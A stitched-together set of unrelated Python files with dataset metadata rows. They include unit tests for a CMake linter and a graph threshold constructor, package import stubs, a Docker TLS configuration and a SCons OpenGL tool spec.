        # Verify the number of calls on each mock
self.assertEqual(mock_get_clientscope_by_name.call_count, 1)
self.assertEqual(mock_create_clientscope.call_count, 0)
self.assertEqual(mock_get_clientscope_by_clientscopeid.call_count, 1)
self.assertEqual(mock_update_clientscope.call_count, 1)
self.assertEqual(mock_get_clientscope_protocolmapper_by_name.call_count, 3)
self.assertEqual(mock_update_clientscope_protocolmappers.call_count, 3)
self.assertEqual(mock_create_clientscope_protocolmapper.call_count, 0)
self.assertEqual(mock_delete_clientscope.call_count, 0)
# Verify that the module's changed status matches what is expected
self.assertIs(exec_info.exception.args[0]['changed'], changed)
if __name__ == '__main__':
unittest.main()

# File: languages/python/exercises/concept/strings/strings.py (repo: AlexLeSang/v3, license: MIT)
def extract_message():
pass
def change_log_level():
pass
def reformat():
pass
| 10.222222 | 23 | 0.652174 | 12 | 92 | 4.75 | 0.666667 | 0.245614 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25 | 92 | 8 | 24 | 11.5 | 0.826087 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0.5 | 0 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
01045568f732108860808fcfdec4b68ffdba0236 | 102 | py | Python | farmer/ncc/callbacks/__init__.py | aiorhiroki/farmer.tf2 | 5d78f4b47b753ab2d595829c17fef7c6061235b5 | [
"Apache-2.0"
] | null | null | null | farmer/ncc/callbacks/__init__.py | aiorhiroki/farmer.tf2 | 5d78f4b47b753ab2d595829c17fef7c6061235b5 | [
"Apache-2.0"
] | 7 | 2021-11-12T05:58:48.000Z | 2022-02-25T07:05:26.000Z | farmer/ncc/callbacks/__init__.py | aiorhiroki/farmer.tf2 | 5d78f4b47b753ab2d595829c17fef7c6061235b5 | [
"Apache-2.0"
] | null | null | null | from .keras_callbacks import *
from .keras_prune import KerasPruningCallback
from .functional import * | 34 | 45 | 0.843137 | 12 | 102 | 7 | 0.583333 | 0.214286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.107843 | 102 | 3 | 46 | 34 | 0.923077 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
012abf6291f1bed2134f4e993cadc72d3594fed2 | 14,399 | py | Python | test/test_find_variable_scopes.py | polysquare/polysquare-cmake-linter | 83f2f12d562b461f9d5bb700b0a17aa9f99751e0 | [
"MIT"
] | 5 | 2016-08-15T15:25:53.000Z | 2022-03-31T15:49:37.000Z | test/test_find_variable_scopes.py | polysquare/polysquare-cmake-linter | 83f2f12d562b461f9d5bb700b0a17aa9f99751e0 | [
"MIT"
] | 6 | 2015-01-01T17:05:25.000Z | 2018-02-01T02:31:09.000Z | test/test_find_variable_scopes.py | polysquare/polysquare-cmake-linter | 83f2f12d562b461f9d5bb700b0a17aa9f99751e0 | [
"MIT"
] | 1 | 2021-01-06T17:32:09.000Z | 2021-01-06T17:32:09.000Z | # /test/test_find_variable_scopes.py
#
# Tests that we're able to find variables inside the scopes that we expect
#
# See /LICENCE.md for Copyright information
"""Test that we're able to find variables inside the scopes that we expect."""
from test.warnings_test_common import Equals
from test.warnings_test_common import FUNCTIONS_SETTING_VARS
from test.warnings_test_common import format_with_command
from test.warnings_test_common import gen_source_line
from cmakeast import ast
from nose_parameterized import param, parameterized
from polysquarecmakelinter import find_variables_in_scopes
from polysquarecmakelinter.find_variables_in_scopes import VariableSource
from testtools import TestCase
from testtools.matchers import MatchesStructure
from testtools.matchers import Not
VarSrc = VariableSource
class TestFindVariablesInScopes(TestCase):
"""Test fixture for the in_tree function."""
params = [param(m) for m in FUNCTIONS_SETTING_VARS]
@parameterized.expand(params, testcase_func_doc=format_with_command())
def test_global_scope(self, matcher):
"""Test setting and finding vars with {} at global scope."""
script = "{0}".format(gen_source_line(matcher))
global_scope = find_variables_in_scopes.set_in_tree(ast.parse(script))
self.assertThat(global_scope.set_vars[0].node,
MatchesStructure(contents=Equals("VALUE")))
@parameterized.expand(params, testcase_func_doc=format_with_command())
def test_in_func_scope(self, matcher):
"""Test setting and finding vars with {} in function scope."""
script = ("function (foo)\n"
" {0}\n"
"endfunction ()\n").format(gen_source_line(matcher))
global_scope = find_variables_in_scopes.set_in_tree(ast.parse(script))
self.assertThat(global_scope.scopes[0].set_vars[0].node,
MatchesStructure(contents=Equals("VALUE")))
@parameterized.expand(params, testcase_func_doc=format_with_command())
def test_if_in_func_scope(self, matcher):
"""Test that using {} in an if block propagates variable to func."""
script = ("function (foo)\n"
" if (CONDITION)\n"
" {0}\n"
" endif (CONDITION)\n"
"endfunction ()\n").format(gen_source_line(matcher))
global_scope = find_variables_in_scopes.set_in_tree(ast.parse(script))
self.assertThat(global_scope.scopes[0].set_vars[0].node,
MatchesStructure(contents=Equals("VALUE")))
@parameterized.expand(params, testcase_func_doc=format_with_command())
def test_elseif_in_func_scope(self, matcher):
"""Test that using {} in an elseif statement propagates variable."""
script = ("function (foo)\n"
" if (CONDITION)\n"
" elseif (CONDITION)\n"
" {0}\n"
" endif (CONDITION)\n"
"endfunction ()\n").format(gen_source_line(matcher))
global_scope = find_variables_in_scopes.set_in_tree(ast.parse(script))
self.assertThat(global_scope.scopes[0].set_vars[0].node,
MatchesStructure(contents=Equals("VALUE")))
@parameterized.expand(params, testcase_func_doc=format_with_command())
def test_else_in_func_scope(self, matcher):
"""Test that using {} in an else statement propagates variable."""
script = ("function (foo)\n"
" if (CONDITION)\n"
" else (CONDITION)\n"
" {0}\n"
" endif (CONDITION)\n"
"endfunction ()\n").format(gen_source_line(matcher))
global_scope = find_variables_in_scopes.set_in_tree(ast.parse(script))
self.assertThat(global_scope.scopes[0].set_vars[0].node,
MatchesStructure(contents=Equals("VALUE")))
@parameterized.expand(params, testcase_func_doc=format_with_command())
def test_while_in_func(self, matcher):
"""Test that using {} in a while block propagates variable to func."""
script = ("function (foo)\n"
" while (CONDITION)\n"
" {0}\n"
" endwhile (CONDITION)\n"
"endfunction ()\n").format(gen_source_line(matcher))
global_scope = find_variables_in_scopes.set_in_tree(ast.parse(script))
self.assertThat(global_scope.scopes[0].set_vars[0].node,
MatchesStructure(contents=Equals("VALUE")))
@parameterized.expand(params, testcase_func_doc=format_with_command())
def test_foreach_in_func(self, matcher):
"""Test that using {} in an foreach statements propagates variable."""
script = ("function (foo)\n"
" foreach (VAR LISTVAR)\n"
" {0}\n"
" endforeach ()\n"
"endfunction ()\n").format(gen_source_line(matcher))
global_scope = find_variables_in_scopes.set_in_tree(ast.parse(script))
self.assertThat(global_scope.scopes[0].set_vars[0].node,
MatchesStructure(contents=Equals("VALUE")))
def test_foreach_scope(self):
"""Test that setting a variable in an foreach statements propagates."""
script = ("function (foo)\n"
" foreach (VAR LISTVAR)\n"
" endforeach ()\n"
"endfunction ()\n")
global_scope = find_variables_in_scopes.set_in_tree(ast.parse(script))
self.assertThat(global_scope.scopes[0].scopes[0].set_vars[0].node,
MatchesStructure(contents=Equals("VAR")))
foreach_type = find_variables_in_scopes.ScopeType.Foreach
self.assertThat(global_scope.scopes[0].scopes[0].info,
MatchesStructure(type=Equals(foreach_type)))
def test_parent_scope(self):
"""Test that setting a variable in the parent scope propagates."""
script = ("function (foo)\n"
" function (other)\n"
" set (VARIABLE OTHER PARENT_SCOPE)\n"
" endfunction ()\n"
"endfunction ()\n")
global_scope = find_variables_in_scopes.set_in_tree(ast.parse(script))
self.assertThat(global_scope.scopes[0].set_vars[0].node,
MatchesStructure(contents=Equals("VARIABLE")))
def test_cache_scope(self):
"""Test that setting a variable in the cache scope is global."""
script = ("function (foo)\n"
" function (other)\n"
" set (VARIABLE OTHER CACHE)\n"
" endfunction ()\n"
"endfunction ()\n")
global_scope = find_variables_in_scopes.set_in_tree(ast.parse(script))
self.assertThat(global_scope.set_vars[0].node,
MatchesStructure(contents=Equals("VARIABLE")))
def test_global_setprop_scope(self):
"""Test that setting a variable in the set_property scope is global."""
script = ("function (foo)\n"
" function (other)\n"
" set_property (GLOBAL PROPERTY VARIABLE OTHER)\n"
" endfunction ()\n"
"endfunction ()\n")
global_scope = find_variables_in_scopes.set_in_tree(ast.parse(script))
self.assertThat(global_scope.set_vars[0].node,
MatchesStructure(contents=Equals("VARIABLE")))
def test_func_var_scope(self):
"""Test function variable scope."""
script = ("function (foo VAR)\n"
"endfunction ()")
global_scope = find_variables_in_scopes.set_in_tree(ast.parse(script))
self.assertThat(global_scope.scopes[0].set_vars[0].node,
MatchesStructure(contents=Equals("VAR")))
def test_macro_var_scope(self):
"""Test macro variable scope."""
script = ("macro (foo VAR)\n"
"endmacro ()")
global_scope = find_variables_in_scopes.set_in_tree(ast.parse(script))
self.assertThat(global_scope.scopes[0].set_vars[0].node,
MatchesStructure(contents=Equals("VAR")))
VARIABLE_USAGE_METHODS = [
"${VALUE}",
"${VALUE}_",
"${VALUE}_${OTHER}",
"${VALUE}/${OTHER}",
"${VARIABLE_${VALUE}_OTHER}",
"VALUE",
]
class TestUsedInTree(TestCase):
"""Test fixture for used_in_tree func."""
@parameterized.expand(VARIABLE_USAGE_METHODS)
def test_use_at_toplevel(self, call):
"""Test that a variable is marked as used at the toplevel."""
script = "f ({0})".format(call)
global_scope = find_variables_in_scopes.used_in_tree(ast.parse(script))
self.assertThat(global_scope.used_vars[0],
MatchesStructure(source=Equals(VarSrc.GlobalVar)))
@parameterized.expand(VARIABLE_USAGE_METHODS)
def test_used_in_func(self, call):
"""Test that a variable is marked as used in a function."""
script = ("function (name)\n"
" f ({0})\n"
"endfunction ()\n").format(call)
global_scope = find_variables_in_scopes.used_in_tree(ast.parse(script))
self.assertThat(global_scope.scopes[0].used_vars[0],
MatchesStructure(source=Equals(VarSrc.FunctionVar)))
@parameterized.expand(VARIABLE_USAGE_METHODS)
def test_used_in_macro(self, call):
"""Test that a variable is marked as used in a macro."""
script = ("macro (name)\n"
" f ({0})\n"
"endmacro ()\n").format(call)
global_scope = find_variables_in_scopes.used_in_tree(ast.parse(script))
self.assertThat(global_scope.scopes[0].used_vars[0],
MatchesStructure(source=Equals(VarSrc.MacroVar)))
@parameterized.expand(VARIABLE_USAGE_METHODS)
def test_used_in_func_nest(self, call):
"""Test that a variable is marked as used in a function when nested."""
script = ("function (name)\n"
" if ()"
" f ({0})\n"
" endif ()"
"endfunction ()\n").format(call)
global_scope = find_variables_in_scopes.used_in_tree(ast.parse(script))
self.assertThat(global_scope.scopes[0].used_vars[0],
MatchesStructure(source=Equals(VarSrc.FunctionVar)))
@parameterized.expand(VARIABLE_USAGE_METHODS)
def test_used_in_func_if(self, call):
"""Test that a variable is marked as used in a function when nested."""
script = ("function (name)\n"
" if ({0})"
" endif ()"
"endfunction ()\n").format(call)
global_scope = find_variables_in_scopes.used_in_tree(ast.parse(script))
self.assertThat(global_scope.scopes[0].used_vars[0],
MatchesStructure(source=Equals(VarSrc.FunctionVar)))
@parameterized.expand(VARIABLE_USAGE_METHODS)
def test_used_in_macro_if(self, call):
"""Test that a variable is marked as used in a function when nested."""
script = ("macro (name)\n"
" if ({0})"
" endif ()"
"endmacro ()\n").format(call)
global_scope = find_variables_in_scopes.used_in_tree(ast.parse(script))
self.assertThat(global_scope.scopes[0].used_vars[0],
MatchesStructure(source=Equals(VarSrc.MacroVar)))
@parameterized.expand(VARIABLE_USAGE_METHODS)
def test_used_in_func_foreach(self, call):
"""Test that a variable is marked as used in a function when nested."""
script = ("function (name)\n"
" foreach (VAR {0})"
" endforeach ()"
"endfunction ()\n").format(call)
global_scope = find_variables_in_scopes.used_in_tree(ast.parse(script))
self.assertThat(global_scope.scopes[0].used_vars[0],
MatchesStructure(source=Equals(VarSrc.FunctionVar)))
@parameterized.expand(VARIABLE_USAGE_METHODS)
def test_used_in_macro_foreach(self, call):
"""Test that a variable is marked as used in a function when nested."""
script = ("macro (name)\n"
" foreach (VAR {0})"
" endforeach ()"
"endmacro ()\n").format(call)
global_scope = find_variables_in_scopes.used_in_tree(ast.parse(script))
self.assertThat(global_scope.scopes[0].used_vars[0],
MatchesStructure(source=Equals(VarSrc.MacroVar)))
def test_not_used_in_function_hdr(self):
"""Test that there is no use in a function header."""
script = ("function (name ARGUMENT)\n"
"endfunction ()")
global_scope = find_variables_in_scopes.used_in_tree(ast.parse(script))
self.assertEqual(len(global_scope.scopes[0].used_vars), 0)
def test_no_use_by_foreach_var(self):
"""Test that there is no use for a foreach var."""
script = ("foreach (VAR ${LIST})\n"
"endforeach ()")
global_scope = find_variables_in_scopes.used_in_tree(ast.parse(script))
self.assertThat(global_scope.used_vars[0].node,
MatchesStructure(contents=Not(Equals("VAR"))))
@parameterized.expand(find_variables_in_scopes.FOREACH_KEYWORDS)
def test_exclude_foreach_kws(self, keyword):
"""Test that there is no use for a foreach keyword."""
script = ("foreach (VAR {0} LIST)\n"
"endforeach ()").format(keyword)
global_scope = find_variables_in_scopes.used_in_tree(ast.parse(script))
self.assertThat(global_scope.used_vars[0].node,
MatchesStructure(contents=Not(Equals(keyword))))
@parameterized.expand(find_variables_in_scopes.IF_KEYWORDS)
def test_exclude_if_kws(self, keyword):
"""Test that there is no use for an if keyword."""
script = ("if ({0} OTHER)\n"
"endif ()").format(keyword)
global_scope = find_variables_in_scopes.used_in_tree(ast.parse(script))
self.assertThat(global_scope.used_vars[0].node,
MatchesStructure(contents=Not(Equals(keyword))))
| 46.75 | 79 | 0.614557 | 1,677 | 14,399 | 5.042338 | 0.081694 | 0.068945 | 0.053217 | 0.074503 | 0.821902 | 0.809721 | 0.777318 | 0.76088 | 0.733207 | 0.693354 | 0 | 0.005987 | 0.269255 | 14,399 | 307 | 80 | 46.90228 | 0.797662 | 0.119036 | 0 | 0.663793 | 0 | 0 | 0.138198 | 0.002073 | 0 | 0 | 0 | 0 | 0.112069 | 1 | 0.107759 | false | 0 | 0.047414 | 0 | 0.168103 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
013134c7b9da253534e31f8aa1b2d6670b2e1a14 | 36 | py | Python | reporter/sources/pipe/__init__.py | Wikia/jira-reporter | af8a2df6dfb679872b82cba67560961d0ad5b2fb | [
"MIT"
] | 3 | 2015-08-19T13:27:24.000Z | 2022-01-14T15:46:19.000Z | reporter/sources/pipe/__init__.py | Wikia/jira-reporter | af8a2df6dfb679872b82cba67560961d0ad5b2fb | [
"MIT"
] | 74 | 2015-01-22T16:30:20.000Z | 2022-03-25T17:03:00.000Z | reporter/sources/pipe/__init__.py | Wikia/jira-reporter | af8a2df6dfb679872b82cba67560961d0ad5b2fb | [
"MIT"
] | 3 | 2016-04-10T18:26:00.000Z | 2020-06-17T06:35:15.000Z | from .pipe import ReportsPipeSource
| 18 | 35 | 0.861111 | 4 | 36 | 7.75 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 36 | 1 | 36 | 36 | 0.96875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0142fc58a701b43bfe5fb293ddaa29b838ecfd09 | 136 | py | Python | ren1/toolspec/OpenGL.py | chadaustin/renaissance | c6e55e2e14b52b3b813a28c83557b5ec963167e3 | [
"MIT"
] | 4 | 2018-11-15T19:31:57.000Z | 2021-04-06T04:24:53.000Z | ren1/toolspec/OpenGL.py | chadaustin/renaissance | c6e55e2e14b52b3b813a28c83557b5ec963167e3 | [
"MIT"
] | 1 | 2020-05-17T17:47:37.000Z | 2020-05-25T17:49:53.000Z | ren1/toolspec/OpenGL.py | chadaustin/renaissance | c6e55e2e14b52b3b813a28c83557b5ec963167e3 | [
"MIT"
] | 1 | 2018-11-22T15:35:05.000Z | 2018-11-22T15:35:05.000Z | def generate(env):
env.Append(CPPDEFINES=['GLEW_STATIC'],
LIBS=['opengl32', 'glu32'])
def exists(env):
return 1
| 19.428571 | 42 | 0.588235 | 16 | 136 | 4.9375 | 0.8125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.048544 | 0.242647 | 136 | 6 | 43 | 22.666667 | 0.718447 | 0 | 0 | 0 | 1 | 0 | 0.176471 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0 | 0.2 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
01515d761b6ec4b2c735ebd0094201f6effa5b4d | 7,610 | py | Python | test/constructor_tests/test_graph_constructor_base.py | wwu-mmll/photonai_graph | b758c7efa878ef4533ed4f66d6579019167bfa9e | [
"MIT"
] | null | null | null | test/constructor_tests/test_graph_constructor_base.py | wwu-mmll/photonai_graph | b758c7efa878ef4533ed4f66d6579019167bfa9e | [
"MIT"
] | 4 | 2022-03-30T20:09:02.000Z | 2022-03-31T13:55:59.000Z | test/constructor_tests/test_graph_constructor_base.py | wwu-mmll/photonai_graph | b758c7efa878ef4533ed4f66d6579019167bfa9e | [
"MIT"
] | null | null | null | import unittest
import numpy as np
from photonai_graph.GraphConstruction.graph_constructor_threshold import GraphConstructorThreshold
class ThresholdTests(unittest.TestCase):
def setUp(self):
self.X4d_adjacency = np.ones((20, 20, 20, 1))
self.X4d_features = np.random.rand(20, 20, 20, 1)
self.X4d = np.concatenate((self.X4d_adjacency, self.X4d_features), axis=3)
self.test_mtrx = np.array(([0.5, 0, 0, 0],
[0, 1, 0, 0],
[0, 0, 1, 0],
[0, 0, 0, 0.5]))
self.y = np.ones(20)
def test_wrong_input_shape(self):
g_constr = GraphConstructorThreshold(threshold=.5)
input_mtrx = np.ones((15, 20, 20))
g_constr.fit(input_mtrx, np.arange(15))
with self.assertRaises(ValueError):
g_constr.transform(input_mtrx)
def test_strange_one_hot_value(self):
with self.assertRaises(ValueError):
GraphConstructorThreshold(one_hot_nodes=27.3)
def test_threshold_4d(self):
# ensure that individual transform style with a 4d matrix returns the right shape
g_constr = GraphConstructorThreshold(threshold=0.5)
g_constr.fit(self.X4d, self.y)
trans = g_constr.transform(self.X4d)
self.assertEqual(trans.shape, (20, 20, 20, 3))
# first dimension should be thresholded but unchanged
self.assertTrue(np.array_equal(trans[..., 0, np.newaxis], self.X4d_adjacency))
# second dimension should contain original connectivity
self.assertTrue(np.array_equal(trans[..., 1, np.newaxis], self.X4d_adjacency))
# last dimension should contain the random features
self.assertTrue(np.array_equal(trans[..., 2, np.newaxis], self.X4d_features))
def test_threshold_4d_discard_connectivity(self):
# ensure that individual transform style with a 4d matrix returns the right shape
g_constr = GraphConstructorThreshold(threshold=0.5,
discard_original_connectivity=True)
g_constr.fit(self.X4d, self.y)
trans = g_constr.transform(self.X4d)
self.assertEqual(trans.shape, (20, 20, 20, 2))
# first dimension should be thresholded but unchanged
self.assertTrue(np.array_equal(trans[..., 0, np.newaxis], self.X4d_adjacency))
# last dimension should contain the random features
self.assertTrue(np.array_equal(trans[..., 1, np.newaxis], self.X4d_features))
def test_threshold_shape_4d_onehot(self):
        # ensure that an individual transform with a 4d matrix returns the right shape
        # when using one-hot-encoded node features
g_constr = GraphConstructorThreshold(threshold=0.5, one_hot_nodes=1)
g_constr.fit(self.X4d, self.y)
trans = g_constr.transform(self.X4d)
self.assertEqual(trans.shape, (20, 20, 20, 4))
# the first dimension still contains the (thresholded but unchanged) values
self.assertTrue(np.array_equal(trans[..., 0, np.newaxis], self.X4d_adjacency))
        # the second dimension contains the one hot encoding
        # We know the one hot encoding, as we created the matrix accordingly
self.assertTrue(np.array_equal(trans[..., 1, np.newaxis],
np.repeat(np.eye(20)[np.newaxis, ...], 20, axis=0)[..., np.newaxis]))
# the third dimension contains again the original values
self.assertTrue(np.array_equal(trans[..., 2, np.newaxis], self.X4d_adjacency))
# the last dimension contains the features
self.assertTrue(np.array_equal(trans[..., 3, np.newaxis], self.X4d_features))
def test_threshold_individual_shape_4d_onehot_discard_connectivity(self):
        # ensure that an individual transform with a 4d matrix returns the right shape
        # when using one-hot-encoded node features
g_constr = GraphConstructorThreshold(threshold=0.5,
one_hot_nodes=1,
discard_original_connectivity=True)
g_constr.fit(self.X4d, self.y)
trans = g_constr.transform(self.X4d)
self.assertEqual(trans.shape, (20, 20, 20, 3))
# the first dimension still contains the (thresholded but unchanged) values
self.assertTrue(np.array_equal(trans[..., 0, np.newaxis], self.X4d_adjacency))
# the second dimesion contains the one hot encoding
# We know the one hot encoding, as we created the matrix accordingly
self.assertTrue(np.array_equal(trans[..., 1, np.newaxis],
np.repeat(np.eye(20)[np.newaxis, ...], 20, axis=0)[..., np.newaxis]))
# the last dimension contains the features
self.assertTrue(np.array_equal(trans[..., 2, np.newaxis], self.X4d_features))
def test_prep_matrix(self):
g_constr = GraphConstructorThreshold(threshold=.0, use_abs=True)
input_matrix = np.eye(4)
output_matrix = g_constr.prep_mtrx(input_matrix * -1)
self.assertTrue(np.array_equal(input_matrix, output_matrix))
def test_use_abs(self):
g_constr = GraphConstructorThreshold(threshold=0.5, use_abs=True)
input_matrix = np.eye(4) * -1
output_matrix = g_constr.prep_mtrx(input_matrix)
self.assertTrue(np.array_equal(np.eye(4), output_matrix))
def test_use_abs_fisher(self):
g_constr = GraphConstructorThreshold(threshold=0.5, fisher_transform=1, use_abs_fisher=1)
input_matrix = np.eye(4) * -1
input_matrix = input_matrix[np.newaxis, :, :, np.newaxis]
output_matrix = g_constr.prep_mtrx(input_matrix)
ids = np.diag(output_matrix[0, ..., 0])
self.assertTrue(np.array_equal(np.isposinf(ids), [True, True, True, True]))
def test_use_zscore(self):
g_constr = GraphConstructorThreshold(threshold=0.5, zscore=1)
output_matrix = g_constr.prep_mtrx(self.test_mtrx[np.newaxis, :, :, np.newaxis])
self.assertEqual((np.sum(np.array(output_matrix) >= 0)), 4)
def test_use_abs_zscore(self):
g_constr = GraphConstructorThreshold(threshold=0.5, zscore=1, use_abs_zscore=1)
output_matrix = g_constr.prep_mtrx(self.test_mtrx[np.newaxis, :, :, np.newaxis])
self.assertEqual((np.sum(np.array(output_matrix) >= 0)), 16)
def test_use_abs_and_fisher(self):
g_constr = GraphConstructorThreshold(threshold=0.5, use_abs=1, fisher_transform=1)
output_matrix = g_constr.prep_mtrx(self.test_mtrx[np.newaxis, :, :, np.newaxis])
self.assertEqual((np.sum(np.array(output_matrix) >= 1)), 2)
def test_use_abs_and_fisher_and_abs_fisher(self):
g_constr = GraphConstructorThreshold(threshold=0.5, use_abs=1, fisher_transform=1, use_abs_fisher=1)
output_matrix = g_constr.prep_mtrx(self.test_mtrx[np.newaxis, :, :, np.newaxis])
self.assertEqual((np.sum(np.array(output_matrix) >= 1)), 2)
def test_use_abs_and_fisher_and_zsore(self):
g_constr = GraphConstructorThreshold(threshold=0.5, use_abs=1, fisher_transform=1, zscore=1)
output_matrix = g_constr.prep_mtrx(self.test_mtrx[np.newaxis, :, :, np.newaxis])
self.assertEqual((np.sum(np.array(output_matrix) >= 1)), 2)
def test_fisher_and_zscore_and_abszscore(self):
g_constr = GraphConstructorThreshold(threshold=0.5, fisher_transform=1, zscore=1, use_abs_zscore=1)
output_matrix = g_constr.prep_mtrx(self.test_mtrx[np.newaxis, :, :, np.newaxis])
self.assertEqual((np.sum(np.array(output_matrix) >= 1)), 2)
| 54.748201 | 108 | 0.663469 | 1,020 | 7,610 | 4.756863 | 0.114706 | 0.047609 | 0.042869 | 0.064922 | 0.828112 | 0.804823 | 0.759481 | 0.752885 | 0.704452 | 0.68817 | 0 | 0.032645 | 0.223127 | 7,610 | 138 | 109 | 55.144928 | 0.788058 | 0.152694 | 0 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.27 | 1 | 0.16 | false | 0 | 0.03 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6d6ddb04320c1bec75b8b79194eed7974535b849 | 236 | py | Python | remoteappmanager/tests/fixtures/remoteappmanager_config.py | fossabot/simphony-remote | 2f3c2d0b7e3b5b3b6a747c929ba6224f622bab33 | [
"BSD-3-Clause"
] | 6 | 2016-10-17T18:37:56.000Z | 2021-12-16T09:38:08.000Z | remoteappmanager/tests/fixtures/remoteappmanager_config.py | fossabot/simphony-remote | 2f3c2d0b7e3b5b3b6a747c929ba6224f622bab33 | [
"BSD-3-Clause"
] | 570 | 2016-06-23T12:09:31.000Z | 2022-03-15T17:04:00.000Z | remoteappmanager/tests/fixtures/remoteappmanager_config.py | fossabot/simphony-remote | 2f3c2d0b7e3b5b3b6a747c929ba6224f622bab33 | [
"BSD-3-Clause"
] | 8 | 2018-03-23T00:00:51.000Z | 2021-08-30T18:54:40.000Z | tls = True
tls_verify = True
tls_ca = '~/.docker/machine/machines/default/ca.pem'
tls_cert = '~/.docker/machine/machines/default/cert.pem'
tls_key = '~/.docker/machine/machines/default/key.pem'
docker_host = "tcp://192.168.99.100:2376"
| 33.714286 | 56 | 0.733051 | 37 | 236 | 4.540541 | 0.486486 | 0.232143 | 0.375 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.068807 | 0.076271 | 236 | 6 | 57 | 39.333333 | 0.701835 | 0 | 0 | 0 | 0 | 0 | 0.639831 | 0.639831 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6d77ecb64f5549a47b0f1156762657bee4124b1f | 162 | py | Python | inet/__init__.py | nestauk/inet | 084d83b1b12652ecb195d241a7d8619315d98998 | [
"MIT"
] | null | null | null | inet/__init__.py | nestauk/inet | 084d83b1b12652ecb195d241a7d8619315d98998 | [
"MIT"
] | null | null | null | inet/__init__.py | nestauk/inet | 084d83b1b12652ecb195d241a7d8619315d98998 | [
"MIT"
] | 2 | 2017-03-09T17:10:20.000Z | 2020-12-16T20:27:04.000Z | # -*- coding: utf-8 -*-
# @Author: James Gardiner
# @Date: 2016-12-13 13:51:46
# @Last Modified by: James Gardiner
# @Last Modified time: 2017-01-24 08:53:13
| 27 | 42 | 0.641975 | 27 | 162 | 3.851852 | 0.777778 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.218045 | 0.179012 | 162 | 5 | 43 | 32.4 | 0.56391 | 0.932099 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6d9b06250ea42e734c25bcd1ae32b7befbd62ca1 | 160 | py | Python | NET_Solver/boundary/__init__.py | phy-ml/neural-solver | 4f5f5e8ab84fa2f6d759f8278683c6a70b16caec | [
"MIT"
] | 2 | 2021-12-05T09:30:22.000Z | 2021-12-05T09:30:40.000Z | NET_Solver/boundary/__init__.py | phy-ml/neural-solver | 4f5f5e8ab84fa2f6d759f8278683c6a70b16caec | [
"MIT"
] | null | null | null | NET_Solver/boundary/__init__.py | phy-ml/neural-solver | 4f5f5e8ab84fa2f6d759f8278683c6a70b16caec | [
"MIT"
] | null | null | null | from .boundary import *
from .Dirichlet import *
from .Neumann import *
from .Periodic import *
from .hard_soft import *
from .transform_neumann import *
